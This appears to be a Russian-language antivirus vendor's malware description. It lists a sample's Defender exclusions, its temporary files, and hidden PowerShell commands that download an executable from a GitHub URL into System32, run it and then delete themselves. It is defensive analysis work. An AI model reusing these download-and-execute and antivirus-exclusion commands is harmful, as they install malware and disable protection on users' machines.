Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса:
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath '<SYSTEM32>'"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionProcess '<SYSTEM32>\systam.exe'"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionExtension '.exe'"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup'"
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\8bcb.tmp\b2e.exe
- %TEMP%\92bd.tmp\batfile.bat
- %TEMP%\selfdel0.bat
Удаляет следующие файлы
- %TEMP%\92bd.tmp\batfile.bat
- %TEMP%\8bcb.tmp\b2e.exe
Другое
Создает и запускает на исполнение
- '%TEMP%\8bcb.tmp\b2e.exe' %TEMP%\8BCB.tmp\b2e.exe <Текущая директория> "<Полный путь к файлу>"
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\92BD.tmp\batfile.bat" " (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/srap18/ddoss/main/systam.exe' -OutFile '<SYSTEM32>\systam.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command Start-Process '<SYSTEM32>\systam.exe' -WindowStyle Hidden
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\selfdel0.bat" " (со скрытым окном)
